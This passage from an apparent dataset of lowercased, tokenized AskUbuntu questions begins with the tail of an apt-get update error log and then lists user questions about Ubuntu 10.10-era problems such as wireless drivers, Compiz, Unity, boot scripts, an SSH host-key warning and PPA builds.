in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick/main i386 packages unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick/restricted i386 packages unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick/universe i386 packages unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick/multiverse i386 packages unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick-updates/main sources unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick-updates/restricted sources unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick-updates/universe sources unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick-updates/multiverse sources unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick-updates/main i386 packages unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick-updates/restricted i386 packages unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick-updates/universe i386 packages unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick-updates/multiverse i386 packages unable to connect to in.archive.ubuntu.com : http : hit http : //deb.opera.com stable/non-free i386 packages hit http : //download.virtualbox.org maverick release get:5 http : //dl.google.com stable/main i386 packages [ 613b ] get:6 http : //ppa.launchpad.net maverick release.gpg [ 316b ] ign http : //ppa.launchpad.net/am-monkeyd/nautilus-elementary-ppa/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/am-monkeyd/nautilus-elementary-ppa/ubuntu/ maverick/main translation-en_in get:7 http : //ppa.launchpad.net maverick release.gpg [ 316b ] ign http : //ppa.launchpad.net/cairo-dock-team/ppa/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/cairo-dock-team/ppa/ubuntu/ maverick/main translation-en_in get:8 http : //ppa.launchpad.net maverick release.gpg [ 316b ] hit http : //download.virtualbox.org maverick/non-free i386 packages ign http : //ppa.launchpad.net/chromium-daily/stable/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/chromium-daily/stable/ubuntu/ maverick/main translation-en_in get:9 http : //ppa.launchpad.net maverick release.gpg [ 307b ] ign http : //ppa.launchpad.net/crebs/ppa/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/crebs/ppa/ubuntu/ maverick/main translation-en_in get:10 http : //ppa.launchpad.net maverick release.gpg [ 316b ] ign http : //ppa.launchpad.net/docky-core/ppa/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/docky-core/ppa/ubuntu/ maverick/main translation-en_in get:11 http : //ppa.launchpad.net maverick release.gpg [ 316b ] ign http : //ppa.launchpad.net/flozz/flozz/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/flozz/flozz/ubuntu/ maverick/main translation-en_in get:12 http : //ppa.launchpad.net maverick release.gpg [ 316b ] ign http : //ppa.launchpad.net/loneowais/ppa/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/loneowais/ppa/ubuntu/ maverick/main translation-en_in get:13 http : //ppa.launchpad.net maverick release.gpg [ 316b ] ign http : //ppa.launchpad.net/shutter/ppa/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/shutter/ppa/ubuntu/ maverick/main translation-en_in get:14 http : //ppa.launchpad.net maverick release.gpg [ 316b ] ign http : //ppa.launchpad.net/tiheum/equinox/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/tiheum/equinox/ubuntu/ maverick/main translation-en_in get:15 http : //ppa.launchpad.net maverick release.gpg [ 316b ] ign http : //ppa.launchpad.net/tualatrix/ppa/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/tualatrix/ppa/ubuntu/ maverick/main translation-en_in get:16 http : //ppa.launchpad.net maverick release.gpg [ 316b ] ign http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu/ maverick/main translation-en_in hit http : //ppa.launchpad.net maverick release hit http : //ppa.launchpad.net maverick release hit http : //ppa.launchpad.net maverick release hit http : //ppa.launchpad.net maverick release hit http : //ppa.launchpad.net maverick release hit http : //ppa.launchpad.net maverick release hit http : //ppa.launchpad.net maverick release hit http : //ppa.launchpad.net maverick release get:17 http : //ppa.launchpad.net maverick release [ 57.3kb ] hit http : //ppa.launchpad.net maverick release hit http : //ppa.launchpad.net maverick release hit http : //ppa.launchpad.net maverick release hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages ign http : //ppa.launchpad.net maverick release hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages get:18 http : //ppa.launchpad.net maverick/main sources [ 352b ] get:19 http : //ppa.launchpad.net maverick/main i386 packages [ 779b ] hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages hit http : //ppa.launchpad.net maverick/main i386 packages hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages fetched 64.5kb in 5min 51s ( 184b/s ) w : gpg error : http : //ppa.launchpad.net maverick release : the following signatures could n't be verified because the public key is not available : no_pubkey fc6d7d9d009ed615 w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/release.gpg could not connect to in.archive.ubuntu.com:80 ( 111.91.91.37 ) . - connect ( 110 : connection timed out ) w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/main/i18n/translation-en.bz2 unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/main/i18n/translation-en_in.bz2 unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/multiverse/i18n/translation-en.bz2 unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/multiverse/i18n/translation-en_in.bz2 unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/restricted/i18n/translation-en.bz2 unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/restricted/i18n/translation-en_in.bz2 unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/universe/i18n/translation-en.bz2 unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/universe/i18n/translation-en_in.bz2 unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/release.gpg unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/main/i18n/translation-en.bz2 unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/main/i18n/translation-en_in.bz2 unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/multiverse/i18n/translation-en.bz2 unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/multiverse/i18n/translation-en_in.bz2 unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/restricted/i18n/translation-en.bz2 unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/restricted/i18n/translation-en_in.bz2 unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/universe/i18n/translation-en.bz2 unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/universe/i18n/translation-en_in.bz2 unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //archive.canonical.com/ubuntu/dists/maverick/release.gpg could not connect to archive.canonical.com:80 ( 91.189.88.33 ) . - connect ( 110 : connection timed out ) w : failed to fetch http : //archive.canonical.com/ubuntu/dists/maverick/partner/i18n/translation-en.bz2 unable to connect to archive.canonical.com : http : w : failed to fetch http : //archive.canonical.com/ubuntu/dists/maverick/partner/i18n/translation-en_in.bz2 unable to connect to archive.canonical.com : http : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/maverick/release.gpg could not connect to extras.ubuntu.com:80 ( 91.189.88.33 ) . - connect ( 110 : connection timed out ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/maverick/main/i18n/translation-en.bz2 unable to connect to extras.ubuntu.com : http : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/maverick/main/i18n/translation-en_in.bz2 unable to connect to extras.ubuntu.com : http : w : failed to fetch http : //archive.canonical.com/ubuntu/dists/maverick/partner/source/sources.gz unable to connect to archive.canonical.com : http : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/maverick/main/source/sources.gz unable to connect to extras.ubuntu.com : http : w : failed to fetch http : //archive.canonical.com/ubuntu/dists/maverick/partner/binary-i386/packages.gz unable to connect to archive.canonical.com : http : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/maverick/main/binary-i386/packages.gz unable to connect to extras.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/main/source/sources.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/restricted/source/sources.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/universe/source/sources.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/multiverse/source/sources.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/main/binary-i386/packages.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/restricted/binary-i386/packages.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/universe/binary-i386/packages.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/multiverse/binary-i386/packages.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/main/source/sources.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/restricted/source/sources.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/universe/source/sources.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/multiverse/source/sources.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/main/binary-i386/packages.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/restricted/binary-i386/packages.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/universe/binary-i386/packages.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/multiverse/binary-i386/packages.gz unable to connect to in.archive.ubuntu.com : http : e : some index files failed to download , they have been ignored , or old ones used instead . gaurav @ gaurav-hcl-me-laptop : ~ $
9766	what would cause compiz window animation durations to not have any effect ?	since i switched from 10.04 i386 to 10.10 x64 compiz window animation duration settings are having no effect . what i mean is if i set it from the default of 80 to 160 or 220 , the speed does not change it 's always just default full speed . however it worked fine on 10.04 . any idea what would be causing this ? perhaps something is overriding it ? to clarify that 's compiz > effects > animations . i am using the sidekick animation .
9770	recommended wireless card for dell latitude d830 ?	can anyone recommend a specific brand and model of wireless card that i can buy to replace the ( completely worthless ) bcm4311 that came with my latitude d830 ? i 've given up on trying to get the existing dw1390 card up and running , and i 'm ready to buy a new card -- as long as it will work with meerkat right out of the box , without any intervention on my part . if i have to do anything other than reinstall meerkat to bring up this laptop on a wireless connection then i 'm not interested . and yes , i 've tried every damned one of the thousands of `` fixes '' and hacks for the bcm4311 on the interwebs , and none of them work . at all . so if there 's a pin-compatible ( non-pcmcia slot ) replacement for the dw1390 that will work with ubuntu i 'm ready to lay out some cash .
9774	enabling multitouch on an acer 5742 ?	i am trying to get multitouch to work on my touchpad . i am currently trying to run a script to get it to work . it is set to start on boot , saved as .run and has been made executable . here is the code : # ! /bin/bash # enable multitouch sleep 10 xinput set-int-prop `` synps/2 synaptics touchpad '' `` two-finger scrolling '' 8 1 xinput set-int-prop `` synps/2 synaptics touchpad '' `` synaptics two-finger scrolling '' 8 1 1 xinput set-int-prop `` synps/2 synaptics touchpad '' `` synaptics two-finger pressure '' 32 10 xinput set-int-prop `` synps/2 synaptics touchpad '' `` synaptics two-finger width '' 32 8 xinput set-int-prop `` synps/2 synaptics touchpad '' `` synaptics edge scrolling '' 8 0 0 0 xinput set-int-prop `` synps/2 synaptics touchpad '' `` synaptics jumpy cursor threshold '' 32 110 synclient tapbutton2=2 exit the commands make multi touch work if i enter them in the terminal , but the script itself does not work . any suggestions ?
9775	picture/video capture programs	what software options are there for taking videos and or pictures within ubuntu ( much like apple 's photobooth ) ? please limit one software solution per answer and include key features/description of the software
9776	skype locking up , and microphone `` lagging ''	i 've always had this problems with skype and pulseaudio on ubuntu . whenever i start up skype , i have to call someone , then hang up 4-5 times , before the other person can hear my voice . when i , or the other person hang up , skype tends to lock up . i ca n't kill it with `` killall skype '' or a logout , so i have to restart my computer . have anyone else encountered this problem , and if so solved this ? i 'm using 10.10 btw .
9780	best place to put application files	hello , where shall i put applications which do not require install ( extracted from archive ) ? e.g . java based programs executable scripts in two variants : for all users for one user some times the archive itself contains directories like lib or bin . for example , apps like argouml shall i put all the apps in /usr/local/appname ?
9781	dual-booting windows 2000 and ubuntu	win98 is on partition 1 , 2000 is on 2 , ubuntu is to be downloaded on 1 = instal on c : w98 is history [ no more updates ] , i 've striped it down to just be a backup save for d : my 2000 is soooo updated that to re-install everything is not an option , i 'm sure my install disc is soooo dated that i wo n't be able to re-update . on c : with win98 i use boot.ini to dual boot = i want to dual boot 2000-ubuntu . will ubuntu and a 'boot.ini ' live together after i install ubuntu on c : ?
9783	how to make xinit run at boot - pre login	i 'm running a stripped down ( minimal install version ) of lucid . for some reason , xinit seems to be failing on boot and i 'm not sure what logs i should start checking - normally i would go with the xorg ones in /var/logs , but running xinit manually after login works just fine , and as far as i can tell the usual xorg. # . # files are n't created . can anyone give me any suggestions as to where to start looking ?
9785	showing files in kmail	hi i added my imap mailbox in kmail , but i see that it show me all the files on the remote home directory where the imap server is stored . is it possible to show only folders cointaing mails ? i tried to play with namespaces but did n't get what i want . thanks
9793	ppa build failed because of unmet dependencies of another package in the same ppa	i have 2 packages swami-2.0.0 and libinstpatch-1.0.0 in my ppa where the first one depends on the latter . the swami-2.0.0 control file contains libinstpatch-dev ( > = 1.0.0 ) but it seems this is not satisfied even after installing that package , with this error in the buildlog : after installing , the following source dependencies are still unsatisfied : libinstpatch-dev ( inst 1.0.0-0~lucid1~ppa1 ! > = wanted 1.0.0 ) source-dependencies not satisfied ; skipping swami is there something wrong with my 1.0.0-0~lucid1~ppa1 version name which causes it to not match 1.0.0 ? here is the swami control file : source : swami section : sound priority : optional maintainer : joshua element green homepage : http : //swami.sourceforge.net standards-version : 3.8.3 build-depends : debhelper ( > = 7 ) , gettext , cdbs ( > = 0.4.41 ) , gnome-pkg-tools ( > = 0.7 ) , libinstpatch-dev ( > = 1.0.0 ) , libgtk2.0-dev ( > = 2.8.17 ) , libgnomecanvas2-dev ( > = 2.0 ) , librsvg2-dev ( > = 2.8 ) , libglade2-dev , libfluidsynth-dev , libfftw3-dev , gtk-doc-tools , docbook-xml build-depends-indep : libglib2.0-doc package : swami architecture : any depends : $ { shlibs : depends } , $ { misc : depends } description : midi instrument editor application swami ( sampled waveforms and musical instruments ) is an application for editing and managing midi instruments , such as soundfont files . an programming api is also provided for integration with other applications . package : swami-dev section : libdevel architecture : any depends : swami ( = $ { binary : version } ) , $ { misc : depends } , libinstpatch-dev ( > = 1.0.0 ) , libgtk2.0-dev ( > = 2.8.17 ) , libgnomecanvas2-dev ( > = 2.0 ) description : midi instrument editor development files swami ( sampled waveforms and musical instruments ) is an application for editing and managing midi instruments , such as soundfont files . an programming api is also provided for integration with other applications . . this package contains the include files and static libraries . package : swami-doc section : doc architecture : all depends : $ { misc : depends } suggests : devhelp description : midi instrument editor development documentation swami ( sampled waveforms and musical instruments ) is an application for editing and managing midi instruments , such as soundfont files . an programming api is also provided for integration with other applications . . this package contains development documentation for swami in /usr/share/gtk-doc/html/libswami and /usr/share/gtk-doc/html/libswamigui . and here is the libinstpatch control file : source : libinstpatch section : sound priority : optional maintainer : joshua element green homepage : http : //swami.sourceforge.net standards-version : 3.8.3 build-depends : debhelper ( > = 7 ) , libglib2.0-dev ( > = 2.14 ) , libsndfile1-dev ( > = 1.0.17-2 ) , gettext , cdbs ( > = 0.4.41 ) , gnome-pkg-tools ( > = 0.7 ) , gtk-doc-tools , docbook-xml build-depends-indep : libglib2.0-doc package : libinstpatch1 section : libs architecture : any depends : $ { misc : depends } , $ { shlibs : depends } description : midi instrument editing library libinstpatch ( lib instrument patch ) is an object oriented library for editing midi instruments such as soundfont files . package : libinstpatch-dev section : libdevel architecture : any depends : libinstpatch1 ( = $ { binary : version } ) , $ { misc : depends } , libglib2.0-dev ( > = 2.14 ) , libsndfile1-dev ( > = 1.0.17-2 ) description : midi instrument editing library development files libinstpatch ( lib instrument patch ) is an object oriented library for editing midi instruments such as soundfont files . . this package contains the include files and static library . package : libinstpatch-doc section : doc architecture : all depends : $ { misc : depends } suggests : devhelp description : midi instrument editing library documentation libinstpatch ( lib instrument patch ) is an object oriented library for editing midi instruments such as soundfont files . . this package contains the documentation for libinstpatch1 in /usr/share/gtk-doc/html/libinstpatch .
9800	`` remote host identification has changed '' warning when connecting over ssh	i got this message today when trying to log into my server . what should i do ? whats going on ? $ ssh 10.10.10.69 @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ warning : remote host identification has changed ! @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ it is possible that someone is doing something nasty ! someone could be eavesdropping on you right now ( man-in-the-middle attack ) ! it is also possible that the rsa host key has just been changed . the fingerprint for the rsa key sent by the remote host is 3d:1b:02:9e : b2 : b8 : f0 : f7 : c6:4f:94:96 : f6 : e3 : c0 : d1 . please contact your system administrator . add correct host key in /root/.ssh/known_hosts to get rid of this message . offending key in /root/.ssh/known_hosts:8 rsa host key for 10.10.10.69 has changed and you have requested strict checking.host key verification failed .
9806	getting a script to run on boot , not on login	how can i get a specific script to run ( preferably not as superuser ) whenever the machine boots , but before login . it can be the last thing to run on boot . i mostly just want the script to work even if no user logs in .
9808	is it possible to use debian repositories in ubuntu ?	since ubuntu is a debian derivative i thought maybe it 's possible
9809	is it possible to mirror the apt repositories ?	i am a student at case western reserve university , and the bandwidth from the ubuntu servers to my location is often horrendously bad ( on the order of a few hundred bytes per second ) . myself and a few friends would like to be able to download the packages once , and have them cached for the rest of our ubuntu installations on campus . to do that , we would either need to setup our own apt repositories , or setup some form of caching ( squid ? ) server at which we could point our systems . is setting up such a mirror a difficult process ? how would one accomplish it ?
9812	install amazonmp3 on a 64-bit desktop	try to install amazonmp3 on a ubuntu desktop 64bit edition . amazon only supports ubuntu 8.10 32bit version . i googled around to see if there was a way to install 32 bit packages under 64 bit ubuntu , i ran into http : //www.ensode.net/roller/dheffelfinger/entry/installing_amazon_mp3_downloader_under ( using getlibs ) . but there are some missing libs no match for libboost_filesystem-gcc42-1_34_1.so.1.34.1 no match for libboost_regex-gcc42-1_34_1.so.1.34.1 no match for libboost_date_time-gcc42-1_34_1.so.1.34.1 no match for libboost_signals-gcc42-1_34_1.so.1.34.1 no match for libboost_iostreams-gcc42-1_34_1.so.1.34.1 no match for libboost_thread-gcc42-mt-1_34_1.so.1.34.1 is there a way to install amazonmp3 on a 64bit ubuntu ?
9816	wireless shows up as disabled , how can i get it working ?	$ sudo iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off pan0 no wireless extensions . $ this is what pops up when i click the two computers icon what should i do to get wifi working on this machine ? $ sudo ifconfig wlan0 up siocsifflags : no such file or directory $ $ lspci | tail 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation ich9m/m-e sata ahci controller ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 01:00.0 vga compatible controller : ati technologies inc m92 lp [ mobility radeon hd 4300 series ] 09:00.0 ethernet controller : marvell technology group ltd. 88e8040 pci-e fast ethernet controller ( rev 13 ) 0c:00.0 network controller : broadcom corporation bcm4312 802.11b/g ( rev 01 ) $
9817	battery drain on ubuntu is fast	my battery drain on win7 is less than that of ubuntu ( around 45 min of difference ) . can you advice me something to get best battery performance on my laptop ? when i decrease the brightness it remains fine for the session but increases on boot ? is there a software to manage my power saving on my laptop ?
9819	format of /proc/mounts ?	there is n't much to say here : - ) where do i find information regarding the format used in the file /proc/mounts ? my current guess is the following ( delimited by a single space ) : device path filesystem flags_delimited_by_commas ? ? ? ? ? ? i 'm rather puzzled about the last two ' ? ? ? ' , though . help is very appreciated ...
9820	how do i debug an overheating problem on a dell inspiron 1564 ?	i have a problem with my laptop ( dell inspiron 1564 core i5 4gb ram vga ati mobility radeon hd 4300 running ubuntu 10.10 32bit ) . it shuts down abruptly without even a lag in the application i am working with before shutdown . i think it 's overheating problem . actually the laptop is hot all the time when i am running ubuntu . when i switch back to windows , even with intense load it wo n't shutdown or show any problem as long as i keep proper ventilation ( when the air openings are blocked it does the same ) . actually on ubuntu i do n't usually do things that need much cpu power , usually surfing internet , coding web pages and sometimes playing with python and ruby . i am not enabling desktop effects so no gpu load except the normal gnome gui . now as i am writing the processor load in the panel monitor applet is 0 % , memory 11 % by programs , 22 % by cache . and i have cpu frequency monitor for each of the 4 cores set to 1.20 ghz ( the lowest possible value , i am not sure if this applet does really limit cpu usage ) . running sensors in terminal gave me temp1 : +26.8°c ( crit = +100.0°c ) temp2 : +0.0°c ( crit = +100.0°c ) hddtemp /dev/sda at the terminal gave me /dev/sda : wdc wd3200bevt-75zct2 : 46°c all that fine but the laptop is really hot i can feel it in the keyboard , mouse pad is painful to touch , and the fan is always spinning . i am also placing 2 small fans running on usb under the laptop right now and the laptop is lifted over the fans so it 's well ventilated . when i am running windows it does n't get that hot except when there is a really big load on the cpu and this is keeping me away from using linux for everyday tasks . actually i do n't care much for speed as i can deal with low speed it 's not going to shutdown abruptly . so please if you can help me and tell me what are the possible causes , where should i start ?
9821	replace evolution with kontact ?	can i remove evolution from gnome to replace it with kontact ? meaning : make all apps use kmail as mailer . make openoffice use kaddressbook get korganizer to show up in the indiciator calendar start akonadi at gnome start make tracker index kontact documents can this be done ?
9835	where do i find the settings and administration menu ?	in ubuntu unity , i ca n't seem to find the settings and administration menus , are they anywhere to be found ?
9842	how to enable shutdown timer ?	before i upgraded to 10.04 last spring , i remember having a timer counting down from 60 after clicking the shutdown button . this gave me a 60 second time frame to interrupt the shutdown in case i forgot to do something . since the upgrade this is gone and my system shuts down immediately when i click the button . anyone who knows how to re-enable the timer ?
9843	how to run java 1.5 applets inside my web browser ?	i need to run an applet that requires java 1.5 . it does not matter if i should uninstall java 6 . even does n't matter if it applies for firefox or chrome . i am using ubuntu 10.04
9848	what are `` $ path '' and `` ~/bin '' ? how can i have personal scripts ?	what is $ path ? how can i have commands/programs which are only available for me ? i have seen this path ~/bin mentioned before , but what is it used for , and how do i use it ?
9853	how can i make `` rc.local '' run on startup ?	i have a script that i would like to run when my system starts . i have put it on `` rc.local '' , but it does n't work . how can i enable it to run on startup ? thanks !
9854	will unity become themeable ?	as of now , unity itself is n't themeable - the theme does n't change - only the window decoration changes , if that makes sense . if unity is to become default in 11.04 , surely it would make sense for the launcher and task bar to change as well ?
9856	how can i make gnome shell default ?	how can i make gnome shell the default interface once it is installed ? upon login or to get it to show up as a session at the login screen ?
9857	will unity require patches to existing gnome components	canonical has stated an interest in providing a way for ubuntu users to gracefully switch over to gnome shell , disabling canonical specific technologies to give the user something as close to the intended gnome experience as possible . maybe through an environment variable setting , or some other easy to use means . first i want to say this is commendable attitude . my question is , is unity engineered such that when other linux distributors , who are shipping nearly stock gnome , may want to provide unity as an alternative interface to their users to choose from among many other options , will that be possible using stock upstream gnome technologies ? or are there a set of yet-to-be-upstreamed patches developed by canonical to existing gnome components that would also need to be integrated by other linux distributors for unity to work as anticipated ?
9861	will unity be the only option during install ?	i 'd like to know if ubuntu will offer other desktop environments as an option during installation . this is only should we decide that unity is not for us .
9865	how can i configure unity 's launcher auto-hide behavior ?	this has been an issue for me with unity since its release . i 'd like to make the the launcher auto-hide . especially on netbooks , where screens are small , the launcher is quite wide , making it difficult to properly display some websites and other apps . how can i configure the auto-hide behavior ?
9867	how to switch window controls to the left ( gnome shell ) ?	is there a way to the switch gnome-shell window buttons to the left ? i 've gotten so used to them being on the left that them being on the right has thrown me way off . ( gnome shell has them defaulted to the right corner )
9868	convert an image from grayscale to binary	i was wondering how to convert an image from grayscale to binary . the image is a pdf format of one-page document . also by using imagemagick 's `` convert 1.pdf 1.eps '' to convert it to eps or other formats such as tif , i found the image become more or less vague . how can i preserve the clearness of the image ? thanks ! update : here is the link to the file http : //www.mediafire.com/download.php ? y7q8l2pyqlukld3 thanks !
9869	will there be a clean upgrade path from 10.10 to 11.04 ?	will there be a straight upgrade path from 10.10 to 11.04 ( gnome to unity ) , and will there be measures put in place to ensure that gnome is properly `` cleaned '' out on the way ?
9877	will the new unity desktop be programmed in qt ?	will the desktop version of unity , scheduled to appear in 11.04 , be programmed using qt ? i ask this in relation to matt zimmerman 's blog posting of several days ago , where he intimated that qt was the more pragmatic choice for an sdk to get coders more involved . as a corollary , it would make sense if the whole desktop were in qt , which would also make it possible to do a lot more beautiful effects , and make a more visually engrossing desktop experience . in any event , please elaborate on the future role of qt in the ubuntu desktop .
9878	set ld_library_path for applications started from the desktop	i have qt creator installed on ubuntu 10.04 lts . when i launch qt creator from the desktop i can build the application i am working on but can not run or debug it . after struggling quite a bit i found that ld_library_path is not set for applications that are run from the desktop . if i start qt creator from bash ( where ld_library_path is set in .bashrc ) everything runs and debugs perfectly . how do i set ld_library_path so that it is set for all running applications ?
9882	what directories do i need to save to backup my user settings ?	ok , so my disk is dying . i have read this - http : //askubuntu.com/questions/2724/best-way-to-clone-ubuntu-installation-copying-to-identical-hardware - but do n't really need to copy the whole partition . my data is safe . 1 ) what i need is to save my application/desktop settings for the user ( i only have one - me ) , and that of the system , since redoing the whole thing can become such a headache and i ca n't remember all of the modifications i 've made . 2 ) make an exact copy of all .deb files installed and mimic/download what is not there yet . because the base install is gon na take care of it , i only have to download/upgrade the rest but not everything . this sounds a little vague . it will only copy the info of what .deb files were installed not the actual .deb files is there an app like this ? thanks !
9883	will you have option to remove unity in 11.04 ?	in the new release of 11.04 will you have the option to uninstall unity and go back to the normal gnome desktop ?
9885	what does it mean when canonical says that ubuntu is and always will be absolutely free ?	in the video linked from this blog entry and other canonical marketing material , it says things like ubuntu is and always will be absolutely free . what does that mean ? especially considering that ubuntu and its related products certainly is n't completely free
9886	how does unity work in multi-monitor configurations ?	unity in 10.10 appeared to be focused around single monitor configurations with a single tasking workflow . this works quite well on a netbook which has limited screen real estate . how does the present version of unity scale up to include multi-monitor and multi-tasking workflows ?
9888	how to browse windows shares from unity	how can i browse windows shares from unity ?
9896	how to track traffic on my server in real time ?	i was wondering if i deploy a server at home , with apache2 . i would like to know how much traffic is currently on my site , in real time . please and thank you . : )
9898	what is the ubuntu loco day ?	what is the purpose of this day ?
